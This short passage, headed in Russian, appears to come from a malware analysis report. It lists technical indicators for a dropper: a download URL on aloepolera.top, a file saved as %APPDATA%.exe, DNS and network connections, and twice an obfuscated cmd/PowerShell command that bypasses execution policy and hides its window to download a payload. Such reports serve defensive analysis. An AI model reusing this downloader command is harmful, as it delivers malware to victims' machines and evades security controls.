Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^ErSHELl.e^XE ^-^EXEc^UtIONP^o^LIC^y^ byPasS^ -n^oPRof^i^l^E -^WINd^O^WS^tY^L^E H^IDDEn (^nE^w^-ob^j^eCt system.n^ET.^WebC^liENT^).DOwNLOAdF^i^L^e('http://aloepolera.top/read.p...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^ErSHELl.e^XE ^-^EXEc^UtIONP^o^LIC^y^ byPasS^ -n^oPRof^i^l^E -^WINd^O^WS^tY^L^E H^IDDEn (^nE^w^-ob^j^eCt system.n^ET.^WebC^liENT^).DOwNLOAdF^i^L^e('http://aloepolera.top/read.p...' (со скрытым окном)